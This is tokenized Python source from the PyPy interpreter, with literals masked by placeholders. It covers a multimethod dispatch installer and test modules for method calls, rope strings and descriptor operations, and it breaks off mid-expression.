_freeze_ ( self ) : <EOL> return True <EOL> class MRDTable ( object ) : <EOL> Counter = <NUM_LIT:0> <EOL> def __init__ ( self , list_of_types ) : <EOL> self . id = MRDTable . Counter <EOL> MRDTable . Counter += <NUM_LIT:1> <EOL> self . list_of_types = list_of_types <EOL> self . typenum = dict ( zip ( list_of_types , range ( len ( list_of_types ) ) ) ) <EOL> self . attrname = '<STR_LIT>' % self . id <EOL> for t1 , num in self . typenum . items ( ) : <EOL> setattr ( t1 , self . attrname , num ) <EOL> self . indexarray = CompressedArray ( <NUM_LIT:0> ) <EOL> def get_typenum ( self , cls ) : <EOL> return self . typenum [ cls ] <EOL> def is_anti_range ( self , typenums ) : <EOL> n = len ( self . list_of_types ) <EOL> if len ( typenums ) <= n // <NUM_LIT:2> : <EOL> return ( None , None ) <EOL> typenums = dict . fromkeys ( typenums ) <EOL> complement = [ typenum for typenum in range ( n ) <EOL> if typenum not in typenums ] <EOL> if not complement : <EOL> return ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> a = min ( complement ) <EOL> b = max ( complement ) + <NUM_LIT:1> <EOL> if complement == range ( a , b ) : <EOL> return ( a , b ) <EOL> else : <EOL> return ( None , None ) <EOL> def normalize_length ( self , next_array ) : <EOL> self . indexarray . ensure_length ( len ( next_array . items ) ) <EOL> def invent_name ( miniglobals , obj ) : <EOL> if isinstance ( obj , str ) : <EOL> return obj <EOL> name = obj . __name__ <EOL> n = <NUM_LIT:1> <EOL> while name in miniglobals : <EOL> n += <NUM_LIT:1> <EOL> name = '<STR_LIT>' % ( obj . __name__ , n ) <EOL> miniglobals [ name ] = obj <EOL> return name <EOL> class FuncEntry ( object ) : <EOL> def __init__ ( self , bodylines , miniglobals , fallback ) : <EOL> self . body = '<STR_LIT>' . join ( bodylines ) <EOL> self . miniglobals = miniglobals <EOL> self . fallback = fallback <EOL> self . possiblenames = [ ] <EOL> self . typetree = { } <EOL> self . _function = None <EOL> def key ( self ) : <EOL> lst = self . miniglobals . items ( ) <EOL> lst . sort ( ) <EOL> return self . body , tuple ( lst ) <EOL> def get_function_name ( self ) : <EOL> length = min ( [ len ( parts ) for parts in self . possiblenames ] ) <EOL> result = [ ] <EOL> for i in range ( length ) : <EOL> choices = { } <EOL> for parts in self . possiblenames : <EOL> choices [ parts [ i ] ] = True <EOL> parts = choices . keys ( ) <EOL> res = str ( len ( parts ) ) <EOL> for part in parts : <EOL> if type ( part ) is str : <EOL> if '<STR_LIT>' in choices : <EOL> res = '<STR_LIT>' <EOL> elif len ( parts ) == <NUM_LIT:1> : <EOL> res = part <EOL> break <EOL> else : <EOL> basecls = parts [ <NUM_LIT:0> ] <EOL> for cls in parts [ <NUM_LIT:1> : ] : <EOL> if issubclass ( basecls , cls ) : <EOL> basecls = cls <EOL> for cls in parts [ <NUM_LIT:1> : ] : <EOL> if not issubclass ( cls , basecls ) : <EOL> break <EOL> else : <EOL> res = basecls . __name__ <EOL> result . append ( res ) <EOL> return '<STR_LIT:_>' . join ( result ) <EOL> def make_function ( self , fnargs , nbargs_before , mrdtable ) : <EOL> if self . _function is not None : <EOL> return self . _function <EOL> name = self . get_function_name ( ) <EOL> self . compress_typechecks ( mrdtable ) <EOL> checklines = self . generate_typechecks ( mrdtable , fnargs [ nbargs_before : ] ) <EOL> if not checklines : <EOL> body = self . body <EOL> else : <EOL> checklines . append ( self . body ) <EOL> body = '<STR_LIT>' . join ( checklines ) <EOL> source = '<STR_LIT>' % ( name , '<STR_LIT:U+002CU+0020>' . join ( fnargs ) , body ) <EOL> self . debug_dump ( source ) <EOL> exec compile2 ( source ) in self . miniglobals <EOL> self . _function = self . miniglobals [ name ] <EOL> return self . _function <EOL> def debug_dump ( self , source ) : <EOL> if <NUM_LIT:0> : <EOL> name = self . get_function_name ( ) <EOL> f = open ( '<STR_LIT>' % name , '<STR_LIT:a>' ) <EOL> for possiblename in self . possiblenames : <EOL> print >> f , '<STR_LIT:#>' , <EOL> for part in possiblename : <EOL> print >> f , getattr ( part , '<STR_LIT>' , part ) , <EOL> print >> f <EOL> print >> f <EOL> print >> f , source <EOL> f . close ( ) <EOL> def register_valid_types ( self , types ) : <EOL> node = self . typetree <EOL> for t1 in types [ : - <NUM_LIT:1> ] : <EOL> if node is True : <EOL> return <EOL> node = node . setdefault ( t1 , { } ) <EOL> if node is True : <EOL> return <EOL> node [ types [ - <NUM_LIT:1> ] ] = True <EOL> def no_typecheck ( self ) : <EOL> self . typetree = True <EOL> def compress_typechecks ( self , mrdtable ) : <EOL> def full ( node ) : <EOL> if node is True : <EOL> return <NUM_LIT:1> <EOL> fulls = <NUM_LIT:0> <EOL> for key , subnode in node . items ( ) : <EOL> if full ( subnode ) : <EOL> node [ key ] = True <EOL> fulls += <NUM_LIT:1> <EOL> if fulls == types_total : <EOL> return <NUM_LIT:1> <EOL> return <NUM_LIT:0> <EOL> types_total = len ( mrdtable . list_of_types ) <EOL> if full ( self . typetree ) : <EOL> self . typetree = True <EOL> def generate_typechecks ( self , mrdtable , args ) : <EOL> attrname = mrdtable . attrname <EOL> possibletypes = [ { } for _ in args ] <EOL> any_type_is_ok = [ False for _ in args ] <EOL> def generate ( node , level = <NUM_LIT:0> ) : <EOL> result = [ ] <EOL> indent = '<STR_LIT:U+0020>' * level <EOL> if node is True : <EOL> for i in range ( level , len ( args ) ) : <EOL> any_type_is_ok [ i ] = True <EOL> result . append ( '<STR_LIT>' % ( indent , ) ) <EOL> return result <EOL> if not node : <EOL> result . append ( '<STR_LIT>' % ( indent , ) ) <EOL> return result <EOL> result . append ( '<STR_LIT>' % ( indent , args [ level ] , <EOL> attrname ) ) <EOL> cases = { } <EOL> for key , subnode in node . items ( ) : <EOL> possibletypes [ level ] [ key ] = True <EOL> casebody = tuple ( generate ( subnode , level + <NUM_LIT:1> ) ) <EOL> typenum = mrdtable . get_typenum ( key ) <EOL> cases . setdefault ( casebody , [ ] ) . append ( typenum ) <EOL> for casebody , typenums in cases . items ( ) : <EOL> typenums . sort ( ) <EOL> cases = [ ( typenums , casebody ) <EOL> for ( casebody , typenums ) in cases . items ( ) ] <EOL> cases . sort ( ) <EOL> if len ( cases ) == <NUM_LIT:1> : <EOL> typenums , casebody = cases [ <NUM_LIT:0> ] <EOL> a , b = mrdtable . is_anti_range ( typenums ) <EOL> else : <EOL> a , b = None , None <EOL> keyword = '<STR_LIT>' <EOL> for typenums , casebody in cases : <EOL> if a is not None : <EOL> if b - a == <NUM_LIT:1> : <EOL> condition = '<STR_LIT>' % a <EOL> elif b == a : <EOL> condition = '<STR_LIT:True>' <EOL> else : <EOL> condition = '<STR_LIT>' % ( <EOL> a , b ) <EOL> else : <EOL> conditions = [ '<STR_LIT>' % typenum <EOL> for typenum in typenums ] <EOL> condition = '<STR_LIT>' . join ( conditions ) <EOL> result . append ( '<STR_LIT>' % ( indent , keyword , condition ) ) <EOL> result . extend ( casebody ) <EOL> keyword = '<STR_LIT>' <EOL> result . append ( '<STR_LIT>' % ( indent , ) ) <EOL> result . append ( '<STR_LIT>' % ( indent , ) ) <EOL> return result <EOL> result = [ ] <EOL> if self . typetree is not True : <EOL> result . extend ( generate ( self . typetree ) ) <EOL> result . append ( '<STR_LIT>' ) <EOL> result . append ( '<STR_LIT>' ) <EOL> for level in range ( len ( args ) ) : <EOL> if not any_type_is_ok [ level ] : <EOL> cls = commonbase ( possibletypes [ level ] . keys ( ) ) <EOL> clsname = invent_name ( self . miniglobals , cls ) <EOL> result . append ( '<STR_LIT>' % ( args [ level ] , <EOL> clsname ) ) <EOL> return result <EOL> def commonbase ( classlist ) : <EOL> def baseclasses ( cls ) : <EOL> result = set ( [ cls ] ) <EOL> for base in cls . __bases__ : <EOL> if '<STR_LIT>' not in base . __dict__ : <EOL> result |= baseclasses ( base ) <EOL> return result <EOL> bag = baseclasses ( classlist [ <NUM_LIT:0> ] ) <EOL> for cls in classlist [ <NUM_LIT:1> : ] : <EOL> bag &= baseclasses ( cls ) <EOL> _ , candidate = max ( [ ( len ( cls . __mro__ ) , cls ) for cls in bag ] ) <EOL> for cls in bag : <EOL> assert issubclass ( candidate , cls ) <EOL> return candidate <EOL> class InstallerVersion2 ( object ) : <EOL> """<STR_LIT>""" <EOL> instance_counter = <NUM_LIT:0> <EOL> mrdtables = { } <EOL> def __init__ ( self , multimethod , prefix , list_of_typeorders , <EOL> baked_perform_call = True , base_typeorder = None ) : <EOL> self . __class__ . instance_counter += <NUM_LIT:1> <EOL> self . multimethod = multimethod <EOL> self . prefix = prefix <EOL> self . list_of_typeorders = list_of_typeorders <EOL> self . baked_perform_call = baked_perform_call <EOL> self . mmfunccache = { } <EOL> args = [ '<STR_LIT>' % i for i in range ( multimethod . arity ) ] <EOL> self . fnargs = ( multimethod . argnames_before + args + <EOL> multimethod . argnames_after ) <EOL> base_typeorder = base_typeorder or list_of_typeorders [ <NUM_LIT:0> ] <EOL> for typeorder in list_of_typeorders : <EOL> for t1 in typeorder : <EOL> assert t1 in base_typeorder <EOL> lst = list ( base_typeorder ) <EOL> def clskey ( cls ) : <EOL> return cls . __mro__ [ : : - <NUM_LIT:1> ] <EOL> lst . sort ( lambda cls1 , cls2 : cmp ( clskey ( cls1 ) , clskey ( cls2 ) ) ) <EOL> key = tuple ( lst ) <EOL> try : <EOL> self . mrdtable = self . mrdtables [ key ] <EOL> except KeyError : <EOL> self . mrdtable = self . mrdtables [ key ] = MRDTable ( key ) <EOL> dispatcher = MMDispatcher ( multimethod , list_of_typeorders ) <EOL> self . table = { } <EOL> def buildtable ( prefixtypes ) : <EOL> if len ( prefixtypes ) == multimethod . arity : <EOL> calllist = dispatcher . expressions ( prefixtypes , <EOL> multimethod . argnames_before , <EOL> args , <EOL> multimethod . argnames_after ) <EOL> if calllist : <EOL> self . table [ prefixtypes ] = calllist <EOL> elif dispatcher . anychance ( prefixtypes ) : <EOL> typeorder = list_of_typeorders [ len ( prefixtypes ) ] <EOL> for t1 in typeorder : <EOL> buildtable ( prefixtypes + ( t1 , ) ) <EOL> buildtable ( ( ) ) <EOL> self . dispatcher = dispatcher <EOL> def is_empty ( self ) : <EOL> return len ( self . table ) == <NUM_LIT:0> <EOL> def install ( self ) : <EOL> nskip = len ( self . multimethod . argnames_before ) <EOL> null_entry = self . build_funcentry ( [ self . prefix , '<STR_LIT>' ] , [ ] ) <EOL> null_entry . no_typecheck ( ) <EOL> if self . is_empty ( ) : <EOL> return self . answer ( null_entry ) <EOL> entryarray = CompressedArray ( null_entry ) <EOL> indexarray = self . mrdtable . indexarray <EOL> lst = self . mrdtable . list_of_types <EOL> indexline = [ ] <EOL> def compress ( typesprefix , typesnum ) : <EOL> if len ( typesprefix ) == self . multimethod . arity : <EOL> calllist = self . table . get ( typesprefix , [ ] ) <EOL> funcname = [ self . prefix ] <EOL> funcname . extend ( typesprefix ) <EOL> entry = self . build_funcentry ( funcname , calllist ) <EOL> entry . register_valid_types ( typesprefix ) <EOL> return entry <EOL> elif self . dispatcher . anychance ( typesprefix ) : <EOL> flatline = [ ] <EOL> for num1 , t1 in enumerate ( lst ) : <EOL> item = compress ( typesprefix + ( t1 , ) , typesnum + ( num1 , ) ) <EOL> flatline . append ( item ) <EOL> if len ( typesprefix ) == self . multimethod . arity - <NUM_LIT:1> : <EOL> array = entryarray <EOL> else : <EOL> array = indexarray <EOL> return array . insert_subarray ( flatline ) <EOL> else : <EOL> return <NUM_LIT:0> <EOL> master_index = compress ( ( ) , ( ) ) <EOL> null_func = null_entry . make_function ( self . fnargs , nskip , self . mrdtable ) <EOL> funcarray = CompressedArray ( null_func ) <EOL> N = <NUM_LIT:1> <EOL> while N < len ( entryarray . items ) : <EOL> N *= <NUM_LIT:2> <EOL> funcarray . ensure_length ( N ) <EOL> for i , entry in enumerate ( entryarray . items ) : <EOL> func = entry . make_function ( self . fnargs , nskip , self . mrdtable ) <EOL> funcarray . items [ i ] = func <EOL> self . mrdtable . normalize_length ( funcarray ) <EOL> attrname = self . mrdtable . attrname <EOL> exprfn = "<STR_LIT>" % master_index <EOL> for n in range ( self . multimethod . arity - <NUM_LIT:1> ) : <EOL> exprfn = "<STR_LIT>" % ( exprfn , n , attrname ) <EOL> n = self . multimethod . arity - <NUM_LIT:1> <EOL> exprfn = "<STR_LIT>" % ( exprfn , n , <EOL> attrname ) <EOL> expr = Call ( exprfn , self . fnargs ) <EOL> entry = self . build_funcentry ( [ self . prefix , '<STR_LIT>' ] , <EOL> [ expr ] , <EOL> indexarray = indexarray , <EOL> funcarray = funcarray , <EOL> mmmask = N - <NUM_LIT:1> ) <EOL> entry . no_typecheck ( ) <EOL> return self . answer ( entry ) <EOL> def answer ( self , entry ) : <EOL> if self . baked_perform_call : <EOL> nskip = len ( self . multimethod . argnames_before ) <EOL> return entry . make_function ( self . fnargs , nskip , self . mrdtable ) <EOL> else : <EOL> assert entry . body . startswith ( '<STR_LIT>' ) <EOL> expr = entry . body [ len ( '<STR_LIT>' ) : ] <EOL> entry . debug_dump ( entry . body ) <EOL> return self . fnargs , expr , entry . miniglobals , entry . fallback <EOL> def build_funcentry ( self , funcnameparts , calllist , ** extranames ) : <EOL> def expr ( v ) : <EOL> if isinstance ( v , Call ) : <EOL> return '<STR_LIT>' % ( invent_name ( miniglobals , v . function ) , <EOL> '<STR_LIT:U+002CU+0020>' . join ( [ expr ( w ) for w in v . arguments ] ) ) <EOL> else : <EOL> return v <EOL> fallback = len ( calllist ) == <NUM_LIT:0> <EOL> if fallback : <EOL> miniglobals = { '<STR_LIT>' : raiseFailedToImplement } <EOL> bodylines = [ '<STR_LIT>' ] <EOL> else : <EOL> miniglobals = { '<STR_LIT>' : FailedToImplement } <EOL> miniglobals . update ( extranames ) <EOL> bodylines = [ ] <EOL> for v in calllist [ : - <NUM_LIT:1> ] : <EOL> bodylines . append ( '<STR_LIT>' ) <EOL> bodylines . append ( '<STR_LIT>' % expr ( v ) ) <EOL> bodylines . append ( '<STR_LIT>' ) <EOL> bodylines . append ( '<STR_LIT>' ) <EOL> bodylines . append ( '<STR_LIT>' % expr ( calllist [ - <NUM_LIT:1> ] ) ) <EOL> miniglobals [ '<STR_LIT>' ] = __name__ <EOL> entry = FuncEntry ( bodylines , miniglobals , fallback ) <EOL> key = entry . key ( ) <EOL> try : <EOL> entry = self . mmfunccache [ key ] <EOL> except KeyError : <EOL> self . mmfunccache [ key ] = entry <EOL> entry . possiblenames . append ( funcnameparts ) <EOL> return entry <EOL> Installer = InstallerVersion1 </s>
<s> import py <EOL> from pypy . conftest import gettestobjspace <EOL> class AppTestCallMethod : <EOL> OPTIONS = { "<STR_LIT>" : True } <EOL> def setup_class ( cls ) : <EOL> cls . space = gettestobjspace ( ** cls . OPTIONS ) <EOL> def test_call_method ( self ) : <EOL> exec """<STR_LIT>""" <EOL> def test_call_attribute ( self ) : <EOL> exec """<STR_LIT>""" <EOL> def test_call_module ( self ) : <EOL> exec """<STR_LIT>""" <EOL> def test_custom_getattr ( self ) : <EOL> exec """<STR_LIT>""" in { } <EOL> def test_custom_getattribute ( self ) : <EOL> exec """<STR_LIT>""" in { } <EOL> def test_builtin ( self ) : <EOL> exec """<STR_LIT>""" <EOL> def test_attributeerror ( self ) : <EOL> exec """<STR_LIT>""" <EOL> class AppTestCallMethodWithGetattributeShortcut ( AppTestCallMethod ) : <EOL> OPTIONS = AppTestCallMethod . OPTIONS . copy ( ) <EOL> OPTIONS [ "<STR_LIT>" ] = True <EOL> class TestCallMethod : <EOL> def setup_class ( cls ) : <EOL> cls . space = gettestobjspace ( ** { "<STR_LIT>" : True } ) <EOL> def test_space_call_method ( self ) : <EOL> space = self . space <EOL> w_lst = space . newlist ( [ ] ) <EOL> space . call_method ( w_lst , '<STR_LIT>' , space . w_False ) <EOL> res = space . int_w ( space . call_method ( w_lst , '<STR_LIT>' ) ) <EOL> assert res == <NUM_LIT:1> <EOL> def test_fallback_case ( self ) : <EOL> space = self . space <EOL> space . int_w ( space . call_method ( space . wrap ( space . sys ) , <EOL> '<STR_LIT>' ) ) <EOL> def test_optimizations_enabled ( self ) : <EOL> from pypy . objspace . std import callmethod <EOL> assert ( self . space . FrameClass . LOOKUP_METHOD . im_func == <EOL> callmethod . LOOKUP_METHOD ) <EOL> assert ( self . space . FrameClass . CALL_METHOD . im_func == <EOL> callmethod . CALL_METHOD ) </s>
<s> import py <EOL> from pypy . objspace . std . test import test_stringobject , test_unicodeobject <EOL> from pypy . conftest import gettestobjspace <EOL> class TestRopeUnicodeObject ( test_unicodeobject . TestUnicodeObject ) : <EOL> def setup_class ( cls ) : <EOL> cls . space = gettestobjspace ( ** { "<STR_LIT>" : True } ) <EOL> class AppTestRopeObject ( test_stringobject . AppTestStringObject ) : <EOL> def setup_class ( cls ) : <EOL> cls . space = gettestobjspace ( ** { "<STR_LIT>" : True } ) <EOL> def test_hash ( self ) : <EOL> pass <EOL> def test_replace_buffer ( self ) : <EOL> skip ( "<STR_LIT>" ) <EOL> class AppTestRopeUnicode ( object ) : <EOL> def setup_class ( cls ) : <EOL> cls . space = gettestobjspace ( ** { "<STR_LIT>" : True } ) <EOL> def test_replace_buffer ( self ) : <EOL> skip ( "<STR_LIT>" ) <EOL> class AppTestUnicodeRopeStdOnly ( test_unicodeobject . AppTestUnicodeStringStdOnly ) : <EOL> def setup_class ( cls ) : <EOL> cls . space = gettestobjspace ( ** { "<STR_LIT>" : True } ) <EOL> class AppTestUnicodeRope ( test_unicodeobject . AppTestUnicodeString ) : <EOL> def setup_class ( cls ) : <EOL> cls . space = gettestobjspace ( usemodules = ( '<STR_LIT>' , ) , <EOL> ** { "<STR_LIT>" : True } ) <EOL> def test_replace_buffer ( self ) : <EOL> skip ( "<STR_LIT>" ) <EOL> def test_replace_with_buffer ( self ) : <EOL> skip ( "<STR_LIT>" ) <EOL> def test_rfind_corner_case ( self ) : <EOL> skip ( "<STR_LIT>" ) <EOL> def test_rsplit ( self ) : <EOL> skip ( "<STR_LIT>" ) </s>
<s> class Test_DescrOperation : <EOL> def test_nonzero ( self ) : <EOL> space = self . space <EOL> assert space . nonzero ( space . w_True ) is space . w_True <EOL> assert space . nonzero ( space . w_False ) is space . w_False <EOL> assert space . nonzero ( space . wrap ( <NUM_LIT> ) ) is space . w_True <EOL> assert space . nonzero ( space . wrap ( <NUM_LIT:0> ) ) is space . w_False <EOL> l = space . newlist ( [ ] ) <EOL> assert space . nonzero ( l ) is space . w_False <EOL> space . call_method ( l , '<STR_LIT>' , space . w_False ) <EOL> assert space . nonzero ( l ) is space . w_True <EOL> class AppTest_Descroperation : <EOL> OPTIONS = { } <EOL> def setup_class ( cls ) : <EOL> from pypy import conftest <EOL> cls . space = conftest . gettestobjspace ( ** cls . OPTIONS ) <EOL> def test_special_methods ( self ) : <EOL> class A ( object ) : <EOL> def __lt__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __imul__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __sub__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __rsub__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __pow__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __rpow__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __neg__ ( self ) : <EOL> return "<STR_LIT>" <EOL> a = A ( ) <EOL> assert ( a < <NUM_LIT:5> ) == "<STR_LIT>" <EOL> assert ( object ( ) > a ) == "<STR_LIT>" <EOL> a1 = a <EOL> a1 *= <NUM_LIT:4> <EOL> assert a1 == "<STR_LIT>" <EOL> assert a - <NUM_LIT:2> == "<STR_LIT>" <EOL> assert a - object ( ) == "<STR_LIT>" <EOL> assert <NUM_LIT:2> - a == "<STR_LIT>" <EOL> assert object ( ) - a == "<STR_LIT>" <EOL> assert a ** <NUM_LIT:2> == "<STR_LIT>" <EOL> assert a ** object ( ) == "<STR_LIT>" <EOL> assert <NUM_LIT:2> ** a == "<STR_LIT>" <EOL> assert object ( ) ** a == "<STR_LIT>" <EOL> assert - a == "<STR_LIT>" <EOL> class B ( A ) : <EOL> def __lt__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __imul__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __sub__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __rsub__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __pow__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __rpow__ ( self , other ) : <EOL> return "<STR_LIT>" <EOL> def __neg__ ( self ) : <EOL> return "<STR_LIT>" <EOL> b = B ( ) <EOL> assert ( a < b ) == "<STR_LIT>" <EOL> assert ( b > a ) == "<STR_LIT>" <EOL> b1 = b <EOL> b1 *= a <EOL> assert b1 == "<STR_LIT>" <EOL> a1 = a <EOL> a1 *= b <EOL> assert a1 == "<STR_LIT>" <EOL> assert a - b == "<STR_LIT>" <EOL> assert b - a == "<STR_LIT>" <EOL> assert b - b == "<STR_LIT>" <EOL> assert a ** b == "<STR_LIT>" <EOL> assert b ** a == "<STR_LIT>" <EOL> assert b ** b == "<STR_LIT>" <EOL> assert - b == "<STR_LIT>" <EOL> class C ( B ) : <EOL> pass <EOL> c = C ( ) <EOL> assert c - <NUM_LIT:1> == "<STR_LIT>" <EOL> assert <NUM_LIT:1> - c == "<STR_LIT>" <EOL> assert c - b == "<STR_LIT>" <EOL> assert b - c == "<STR_LIT>" <EOL> assert c ** <NUM_LIT:1> == "<STR_LIT>" <EOL> assert <NUM_LIT:1> ** c == "<STR_LIT>" <EOL> assert c ** b == "<STR_LIT>" <EOL> assert b ** c == "<STR_LIT>" <EOL> def test_getslice ( self ) : <EOL> class Sq ( object ) : <EOL> def __getslice__ ( self , start , stop ) : <EOL> return ( start , stop ) <EOL> def __getitem__ ( self , key ) : <EOL> return "<STR_LIT>" <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:100> <EOL> sq = Sq ( ) <EOL> assert sq [ <NUM_LIT:1> : <NUM_LIT:3> ] == ( <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> slice_min , slice_max = sq [ : ] <EOL> assert slice_min == <NUM_LIT:0> <EOL> assert slice_max >= <NUM_LIT:2> ** <NUM_LIT> - <NUM_LIT:1> <EOL> assert sq [ <NUM_LIT:1> : ] == ( <NUM_LIT:1> , slice_max ) <EOL> assert sq [ : <NUM_LIT:3> ] == ( <NUM_LIT:0> , <NUM_LIT:3> ) <EOL> assert sq [ : ] == ( <NUM_LIT:0> , slice_max ) <EOL> assert sq [ - <NUM_LIT:1> : <NUM_LIT:3> ] == ( <NUM_LIT> , <NUM_LIT:3> ) <EOL> assert sq [ <NUM_LIT:1> : - <NUM_LIT:3> ] == ( <NUM_LIT:1> , <NUM_LIT> ) <EOL> assert sq [ - <NUM_LIT:1> : - <NUM_LIT:3> ] == ( <NUM_LIT> , <NUM_LIT> ) <EOL> assert sq [ : : ] == "<STR_LIT>" <EOL> def test_setslice ( self ) : <EOL> class Sq ( object ) : <EOL> def __setslice__ ( self , start , stop , sequence ) : <EOL> ops . append ( ( start , stop , sequence ) ) <EOL> def __setitem__ ( self , key , value ) : <EOL> raise AssertionError , key <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:100> <EOL> sq = Sq ( ) <EOL> ops = [ ] <EOL> sq [ - <NUM_LIT:5> : <NUM_LIT:3> ] = '<STR_LIT:hello>' <EOL> sq [ <NUM_LIT:12> : ] = '<STR_LIT>' <EOL> sq [ : - <NUM_LIT:1> ] = '<STR_LIT>' <EOL> sq [ : ] = '<STR_LIT>' <EOL> slice_max = ops [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] <EOL> assert slice_max >= <NUM_LIT:2> ** <NUM_LIT> - <NUM_LIT:1> <EOL> assert ops == [ <EOL> ( <NUM_LIT> , <NUM_LIT:3> , '<STR_LIT:hello>' ) , <EOL> ( <NUM_LIT:12> , slice_max , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:0> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:0> , slice_max , '<STR_LIT>' ) , <EOL> ] <EOL> def test_delslice ( self ) : <EOL> class Sq ( object ) : <EOL> def __delslice__ ( self , start , stop ) : <EOL> ops . append ( ( start , stop ) ) <EOL> def __delitem__ ( self , key ) : <EOL> raise AssertionError , key <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:100> <EOL> sq = Sq ( ) <EOL> ops = [ ] <EOL> del sq [ <NUM_LIT:5> : - <NUM_LIT:3> ] <EOL> del sq [ - <NUM_LIT:12> : ] <EOL> del sq [ : <NUM_LIT:1> ] <EOL> del sq [ : ] <EOL> slice_max = ops [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] <EOL> assert slice_max >= <NUM_LIT:2> ** <NUM_LIT> - <NUM_LIT:1> <EOL> assert ops == [ <EOL> ( <NUM_LIT:5> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , slice_max ) , <EOL> ( <NUM_LIT:0> , <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:0> , slice_max ) , <EOL> ] <EOL> def test_ipow ( self ) : <EOL> x = <NUM_LIT:2> <EOL> x **= <NUM_LIT:5> <EOL> assert x == <NUM_LIT:32> <EOL> def test_typechecks ( self ) : <EOL> class myint ( int ) : <EOL> pass <EOL> class X ( object ) : <EOL> def __nonzero__ ( self ) : <EOL> return myint ( <NUM_LIT:1> ) <EOL> raises ( TypeError , "<STR_LIT>" ) <EOL> def test_string_subclass ( self ) : <EOL> class S ( str ) : <EOL> def __hash__ ( self ) : <EOL> return <NUM_LIT> <EOL> s = S ( "<STR_LIT:abc>" ) <EOL> setattr ( s , s , s ) <EOL> assert len ( s . __dict__ ) == <NUM_LIT:1> <EOL> assert getattr ( s , s ) is s <EOL> def test_notimplemented ( self ) : <EOL> import operator <EOL> def specialmethod ( self , other ) : <EOL> return NotImplemented <EOL> def check ( expr , x , y , operator = operator ) : <EOL> raises ( TypeError , expr ) <EOL> for metaclass in [ type ] : <EOL> for name , expr , iexpr in [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , None ) ] : <EOL> if name == '<STR_LIT>' : <EOL> rname = name <EOL> else : <EOL> rname = '<STR_LIT>' + name [ <NUM_LIT:2> : ] <EOL> A = metaclass ( '<STR_LIT:A>' , ( ) , { name : specialmethod } ) <EOL> B = metaclass ( '<STR_LIT:B>' , ( ) , { rname : specialmethod } ) <EOL> a = A ( ) <EOL> b = B ( ) <EOL> check ( expr , a , a ) <EOL> check ( expr , a , b ) <EOL> check ( expr , b , a ) <EOL> check ( expr , b , b ) <EOL> check ( expr , a , <NUM_LIT:5> ) <EOL> check ( expr , <NUM_LIT:5> , b ) <EOL> if iexpr : <EOL> check ( iexpr , a , a ) <EOL> check ( iexpr , a , b ) <EOL> check ( iexpr , b , a ) <EOL> check ( iexpr , b , b ) <EOL> check ( iexpr , a , <NUM_LIT:5> ) <EOL> iname = '<STR_LIT>' + name [ <NUM_LIT:2> : ] <EOL> C = metaclass ( '<STR_LIT:C>' , ( ) , { iname : specialmethod } ) <EOL> c = C ( ) <EOL> check ( iexpr , c , a ) <EOL> check ( iexpr , c , b ) <EOL> check ( iexpr , c , <NUM_LIT:5> ) <EOL> def test_string_results ( self ) : <EOL> class A ( object ) : <EOL> def __str__ ( self ) : <EOL> return answer * <NUM_LIT:2> <EOL> def __repr__ ( self ) : <EOL> return answer * <NUM_LIT:3> <EOL> def __hex__ ( self ) : <EOL> return answer * <NUM_LIT:4> <EOL> def __oct__ ( self ) : <EOL> return answer * <NUM_LIT:5> <EOL> for operate , n in [ ( str , <NUM_LIT:2> ) , ( repr , <NUM_LIT:3> ) , ( hex , <NUM_LIT:4> ) , ( oct , <NUM_LIT:5> ) ] : <EOL> answer = "<STR_LIT:hello>" <EOL> assert operate ( A ( ) ) == "<STR_LIT:hello>" * n <EOL> if operate not in ( hex , oct ) : <EOL> answer = u"<STR_LIT>" <EOL> assert operate ( A ( ) ) == "<STR_LIT>" * n <EOL> assert type ( operate ( A ( ) ) ) is str <EOL> answer = <NUM_LIT> <EOL> raises ( TypeError , operate , A ( ) ) <EOL> def test_missing_getattribute ( self ) : <EOL> class X ( object ) : pass <EOL> class Y ( X ) : <EOL> class __metaclass__ ( type ) : <EOL> def mro ( cls ) : <EOL> return [ cls , X ] <EOL> x = X ( ) <EOL> x . __class__ = Y <EOL> raises ( AttributeError , getattr , x , '<STR_LIT:a>' ) <EOL> def test_silly_but_consistent_order ( self ) : <EOL> class A ( object ) : pass <EOL> class zz ( object ) : pass <EOL> assert A ( ) < zz ( ) <EOL> assert zz ( ) > A ( ) <EOL> assert <NUM_LIT:0> < ( 